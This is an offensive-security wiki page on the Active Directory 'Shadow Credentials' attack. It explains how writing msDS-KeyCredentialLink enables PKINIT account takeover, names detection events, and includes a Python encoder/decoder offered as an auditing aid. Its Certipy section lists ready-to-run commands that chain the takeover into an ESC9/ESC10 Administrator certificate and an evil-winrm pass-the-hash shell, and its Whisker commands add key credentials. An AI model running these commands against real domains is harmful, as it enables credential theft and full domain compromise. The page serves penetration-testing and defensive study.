# Shadow Credentials

Shadow Credentials is an attack technique for taking over an Active Directory user or computer account by writing to the `msDS-KeyCredentialLink` attribute of the target object. The attribute normally holds the public keys that Windows Hello for Business and Azure AD joined devices register for passwordless (PKINIT) logon; an attacker who can write it registers a key of their own.

### Exploit <a href="#exploit" id="exploit"></a>

If the attacker has write access to the `msDS-KeyCredentialLink` attribute of a target user or computer account (for example `GenericWrite`, `GenericAll` or `WriteProperty` on the object), they can append a KeyCredential that carries the public key of a key pair they generated. The domain controller then accepts Kerberos PKINIT pre-authentication with the matching private key, so the attacker obtains a TGT for the account without knowing its password and, via Kerberos User-to-User (U2U), can recover the account's NT hash from the PAC (UnPAC-the-hash). The domain needs at least one Windows Server 2016 domain controller, and that DC must hold a certificate usable for PKINIT (normally issued by AD CS); without it PKINIT fails with `KDC_ERR_PADATA_TYPE_NOSUPP`. On the defensive side, the attribute write appears as Event ID 5136 if Directory Service Changes auditing covers `msDS-KeyCredentialLink`, and the PKINIT logon appears as Event ID 4768 with the certificate fields (issuer, serial number, thumbprint) populated.
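The value the tools on this page write is an LDAP DN-Binary string (`B:<hex length>:<hex>:<owner DN>`) wrapping a `KEYCREDENTIALLINK_BLOB` ([MS-ADTS] 2.2.20): a version field followed by length-prefixed entries for KeyID, KeyHash, KeyMaterial, KeyUsage, KeySource, DeviceId and timestamps. The Python below is an added example for this page, not code from Certipy, Whisker or pywhisker. It builds such a value and decodes it back, verifying the KeyID (SHA-256 of the key material) and the KeyHash (SHA-256 of every entry after it), which is what an auditor wants when dumping the attribute from suspicious accounts. The key material, device ID, owner DN and timestamp are constructed; the key material stands in for the `BCRYPT_RSAKEY_BLOB` a real tool stores. The code does not talk to LDAP.

```python
"""Build and decode msDS-KeyCredentialLink values (KEYCREDENTIALLINK_BLOB, [MS-ADTS] 2.2.20).

Added example; not code from Certipy, Whisker or pywhisker. Sample inputs below are constructed.
"""
import hashlib
import struct
import uuid
from datetime import datetime, timedelta, timezone

VERSION = 0x00000200          # the only blob version in use
# Entry identifiers ([MS-ADTS] 2.2.20.2)
KEY_ID, KEY_HASH, KEY_MATERIAL, KEY_USAGE, KEY_SOURCE = 0x01, 0x02, 0x03, 0x04, 0x05
DEVICE_ID, CUSTOM_KEY_INFO, LAST_LOGON, CREATION_TIME = 0x06, 0x07, 0x08, 0x09
KEY_USAGE_NGC = 0x01          # Windows Hello for Business / PKINIT key
KEY_SOURCE_AD = 0x00

_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def to_filetime(dt: datetime) -> bytes:
    """UTC datetime -> little-endian FILETIME (100 ns ticks since 1601-01-01)."""
    delta = dt - _FILETIME_EPOCH
    ticks = (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10
    return struct.pack("<Q", ticks)


def from_filetime(raw: bytes) -> datetime:
    ticks = struct.unpack("<Q", raw)[0]
    return _FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def _entry(ident: int, value: bytes) -> bytes:
    """KEYCREDENTIALLINK_ENTRY: Length (2 bytes) | Identifier (1 byte) | Value."""
    return struct.pack("<HB", len(value), ident) + value


def build_key_credential_link(key_material: bytes, device_id: uuid.UUID,
                              owner_dn: str, created: datetime) -> str:
    """Return the DN-Binary string an LDAP client writes to msDS-KeyCredentialLink."""
    # KeyHash covers every entry after itself; KeyID is the hash of the key material.
    tail = (
        _entry(KEY_MATERIAL, key_material)
        + _entry(KEY_USAGE, bytes([KEY_USAGE_NGC]))
        + _entry(KEY_SOURCE, bytes([KEY_SOURCE_AD]))
        + _entry(DEVICE_ID, device_id.bytes_le)          # GUIDs are stored little-endian
        + _entry(CUSTOM_KEY_INFO, bytes([0x01, 0x00]))   # version 1, no flags
        + _entry(LAST_LOGON, to_filetime(created))
        + _entry(CREATION_TIME, to_filetime(created))
    )
    blob = (
        struct.pack("<I", VERSION)
        + _entry(KEY_ID, hashlib.sha256(key_material).digest())
        + _entry(KEY_HASH, hashlib.sha256(tail).digest())
        + tail
    )
    hexblob = blob.hex().upper()
    return f"B:{len(hexblob)}:{hexblob}:{owner_dn}"


def parse_key_credential_link(value: str) -> dict:
    """Decode one DN-Binary value and verify its KeyID and KeyHash."""
    prefix, hexlen, hexblob, owner_dn = value.split(":", 3)
    if prefix != "B" or int(hexlen) != len(hexblob):
        raise ValueError("not a DN-Binary value")
    blob = bytes.fromhex(hexblob)
    version = struct.unpack_from("<I", blob, 0)[0]
    if version != VERSION:
        raise ValueError(f"unsupported KeyCredentialLink version {version:#x}")
    entries, off, hashed_from = {}, 4, None
    while off < len(blob):
        length, ident = struct.unpack_from("<HB", blob, off)
        off += 3
        entries[ident] = blob[off:off + length]
        off += length
        if ident == KEY_HASH:
            hashed_from = off          # KeyHash protects everything from here on
    key_material = entries[KEY_MATERIAL]
    return {
        "owner_dn": owner_dn,
        "device_id": uuid.UUID(bytes_le=entries[DEVICE_ID]),
        "key_usage": entries[KEY_USAGE][0],
        "key_source": entries[KEY_SOURCE][0],
        "created": from_filetime(entries[CREATION_TIME]),
        "key_material": key_material,
        "key_id_ok": entries[KEY_ID] == hashlib.sha256(key_material).digest(),
        "key_hash_ok": hashed_from is not None
        and entries[KEY_HASH] == hashlib.sha256(blob[hashed_from:]).digest(),
    }


# Constructed sample input (not a real key, account or domain).
SAMPLE_KEY_MATERIAL = bytes(range(256)) * 2      # stands in for a 2048-bit RSA public key blob
SAMPLE_DEVICE_ID = uuid.UUID("11111111-2222-3333-4444-555555555555")
SAMPLE_OWNER_DN = "CN=john,CN=Users,DC=example,DC=local"
SAMPLE_CREATED = datetime(2024, 1, 15, 12, 0, 0, tzinfo=timezone.utc)


def demo() -> dict:
    value = build_key_credential_link(SAMPLE_KEY_MATERIAL, SAMPLE_DEVICE_ID,
                                      SAMPLE_OWNER_DN, SAMPLE_CREATED)
    return parse_key_credential_link(value)


if __name__ == "__main__":
    for key, val in demo().items():
        print(f"{key:>13}: {val[:8].hex() + '...' if key == 'key_material' else val}")
```

When auditing, feed each value of `msDS-KeyCredentialLink` from an LDAP dump into `parse_key_credential_link` and look at `device_id`, `created` and the two hash checks: a freshly created key on a privileged account, or a DeviceId that matches no enrolled device, is the artifact this attack leaves behind.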

#### Using Certipy <a href="#using-certipy" id="using-certipy"></a>

```
# 1. Shadow Credentials proper: add a KeyCredential to the target account, obtain a TGT via
#    PKINIT, recover the target's NT hash (UnPAC-the-hash) and remove the KeyCredential again.
#    Needs write access to msDS-KeyCredentialLink of <target-user> (computer accounts end in $).
#    "shadow add/list/remove/clear" are available for doing the steps by hand.
certipy shadow auto -u <user>@<domain> -hashes <nt-hash-of-user> -dc-ip <dc-ip> -account <target-user>

# Steps 2 to 5 are not Shadow Credentials; they are the ESC9/ESC10 follow-on from the Certipy
# documentation, which uses the NT hash obtained in step 1. They also need write access to the
# target's userPrincipalName and a template whose SAN is built from the UPN.

# 2. Change the target account's UPN to "Administrator"
certipy account update -u <user>@<domain> -hashes <nt-hash-of-user> -dc-ip <dc-ip> -user <target-user> -upn Administrator

# (Optional) Enumerate templates Certipy flags as vulnerable. Note the 'Template Name' and
#    'Certificate Authorities' values; they are used below. ESC9 is reported here; ESC10 depends
#    on registry settings on the DC and has to be checked separately.
certipy find -u <user>@<domain> -hashes <nt-hash-of-user> -dc-ip <dc-ip> -stdout -vulnerable

# 3. Request a certificate as the target account, authenticating with the hash from step 1.
#    The SAN is derived from the UPN set in step 2, so the certificate is issued for Administrator.
certipy req -u <target-user>@<domain> -hashes <nt-hash-of-target-user> -dc-ip <dc-ip> -ca <ca> -template <template>

# 4. Restore the target account's original UPN
certipy account update -u <user>@<domain> -hashes <nt-hash-of-user> -dc-ip <dc-ip> -user <target-user> -upn <target-user>@<domain>

# 5. Authenticate with the certificate; Certipy prints the NT hash of Administrator
certipy auth -pfx administrator.pfx -domain <domain> -dc-ip <dc-ip>

# 6. Pass the hash to open a WinRM session as Administrator
evil-winrm -i <target-ip> -u administrator -H <nt-hash-of-administrator>
```

#### Using Whisker <a href="#using-whisker" id="using-whisker"></a>

[Whisker](https://github.com/eladshamir/Whisker) is a C# tool for taking over Active Directory user and computer accounts by manipulating their `msDS-KeyCredentialLink` attribute. `add` generates the key pair and self-signed certificate, writes the KeyCredential, and prints a ready-made Rubeus `asktgt` command (with `/getcredentials`) that obtains a TGT via PKINIT and recovers the account's NT hash. `list` shows the existing KeyCredentials with their DeviceIds, and `remove /deviceid:<guid>` or `clear` cleans up afterwards; leaving the entry behind is both noisy and a persistence backdoor.

```
Whisker.exe add /target:john /domain:example.local /dc:<dc-fqdn>
Whisker.exe list /target:john /domain:example.local /dc:<dc-fqdn>
```

### References <a href="#references" id="references"></a>

* [Red Team Notes](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials)
